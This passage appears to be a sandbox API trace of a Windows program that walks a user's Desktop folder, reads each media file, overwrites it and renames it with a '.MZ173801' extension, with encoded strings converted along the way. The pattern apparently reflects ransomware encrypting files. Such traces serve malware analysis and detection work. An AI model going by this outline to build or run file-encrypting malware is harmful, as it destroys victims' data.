lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.230] GetCurrentThreadId () returned 0x1358 [0124.230] GetCurrentThreadId () returned 0x1358 [0124.230] GetCurrentThreadId () returned 0x1358 [0124.230] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\DReqJFNMJBL_6uj.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\dreqjfnmjbl_6uj.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.230] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0124.230] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.230] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0xf4ee [0124.231] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.231] ReadFile (in: hFile=0x414, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xf4ee, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0xf4ee, lpOverlapped=0x0) returned 1 [0124.232] CloseHandle (hObject=0x414) returned 1 [0124.233] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\DReqJFNMJBL_6uj.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\dreqjfnmjbl_6uj.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.235] WriteFile (in: hFile=0x414, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0xf4ee, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f6f0*=0xf4ee, lpOverlapped=0x0) returned 1 [0124.237] CloseHandle (hObject=0x414) returned 1 [0124.237] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\DReqJFNMJBL_6uj.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\dreqjfnmjbl_6uj.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\DReqJFNMJBL_6uj.mkv.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\dreqjfnmjbl_6uj.mkv.mz173801")) returned 1 [0124.238] GetCurrentThreadId () returned 0x1358 [0124.238] GetCurrentThreadId () returned 0x1358 [0124.238] GetCurrentThreadId () returned 0x1358 [0124.238] GetCurrentThreadId () returned 0x1358 [0124.238] GetCurrentThreadId () returned 0x1358 [0124.238] GetCurrentThreadId () returned 0x1358 [0124.238] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb686470, ftCreationTime.dwHighDateTime=0x1d5eb3c, ftLastAccessTime.dwLowDateTime=0xbfaf2100, ftLastAccessTime.dwHighDateTime=0x1d5ea26, ftLastWriteTime.dwLowDateTime=0xbfaf2100, ftLastWriteTime.dwHighDateTime=0x1d5ea26, nFileSizeHigh=0x0, nFileSizeLow=0xab5a, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="hEI_tuSWJhfHIz05Nj8z.flv", cAlternateFileName="HEI_TU~1.FLV")) returned 1 [0124.238] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.238] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.238] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\hEI_tuSWJhfHIz05Nj8z.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\hei_tuswjhfhiz05nj8z.flv"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb686470, ftCreationTime.dwHighDateTime=0x1d5eb3c, ftLastAccessTime.dwLowDateTime=0xbfaf2100, ftLastAccessTime.dwHighDateTime=0x1d5ea26, ftLastWriteTime.dwLowDateTime=0xbfaf2100, ftLastWriteTime.dwHighDateTime=0x1d5ea26, nFileSizeHigh=0x0, nFileSizeLow=0xab5a)) returned 1 [0124.239] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.239] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0124.239] GetCurrentThreadId () returned 0x1358 [0124.239] GetCurrentThreadId () returned 0x1358 [0124.239] GetCurrentThreadId () returned 0x1358 [0124.239] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.239] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0124.240] GetCurrentThreadId () returned 0x1358 [0124.240] GetCurrentThreadId () returned 0x1358 [0124.240] GetCurrentThreadId () returned 0x1358 [0124.240] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\hEI_tuSWJhfHIz05Nj8z.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\hei_tuswjhfhiz05nj8z.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.240] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d8*=0) returned 0x0 [0124.240] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.240] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0xab5a [0124.240] SetFilePointer (in: hFile=0x414, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f6d0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f6d0*=0) returned 0x0 [0124.240] ReadFile (in: hFile=0x414, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xab5a, lpNumberOfBytesRead=0x19f6e4, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f6e4*=0xab5a, lpOverlapped=0x0) returned 1 [0124.241] CloseHandle (hObject=0x414) returned 1 [0124.242] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\hEI_tuSWJhfHIz05Nj8z.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\hei_tuswjhfhiz05nj8z.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x414 [0124.243] WriteFile (in: hFile=0x414, lpBuffer=0x243db60*, nNumberOfBytesToWrite=0xab5a, lpNumberOfBytesWritten=0x19f6f0, lpOverlapped=0x0 | out: lpBuffer=0x243db60*, lpNumberOfBytesWritten=0x19f6f0*=0xab5a, lpOverlapped=0x0) returned 1 [0124.245] CloseHandle (hObject=0x414) returned 1 [0124.245] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\hEI_tuSWJhfHIz05Nj8z.flv" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\hei_tuswjhfhiz05nj8z.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\hEI_tuSWJhfHIz05Nj8z.flv.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\hei_tuswjhfhiz05nj8z.flv.mz173801")) returned 1 [0124.246] GetCurrentThreadId () returned 0x1358 [0124.246] GetCurrentThreadId () returned 0x1358 [0124.246] GetCurrentThreadId () returned 0x1358 [0124.246] GetCurrentThreadId () returned 0x1358 [0124.246] GetCurrentThreadId () returned 0x1358 [0124.246] GetCurrentThreadId () returned 0x1358 [0124.246] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56419200, ftCreationTime.dwHighDateTime=0x1d5e334, ftLastAccessTime.dwLowDateTime=0xe3196650, ftLastAccessTime.dwHighDateTime=0x1d5eb3e, ftLastWriteTime.dwLowDateTime=0xe3196650, ftLastWriteTime.dwHighDateTime=0x1d5eb3e, nFileSizeHigh=0x0, nFileSizeLow=0xbd5, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="HPSq.wav", cAlternateFileName="")) returned 1 [0124.246] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0124.246] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0124.246] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\XDnTXxKBW\\HPSq.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\xdntxxkbw\\hpsq.wav"), fInfoLevelId=0x0, lpFileInformation=0x19f724 | out: lpFileInformation=0x19f724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56419200, ftCreationTime.dwHighDateTime=0x1d5e334, ftLastAccessTime.dwLowDateTime=0xe3196650, ftLastAccessTime.dwHighDateTime=0x1d5eb3e, ftLastWriteTime.dwLowDateTime=0xe3196650, ftLastWriteTime.dwHighDateTime=0x1d5eb3e, nFileSizeHigh=0x0, nFileSizeLow=0xbd5)) returned 1 [0124.246] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0124.246] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0U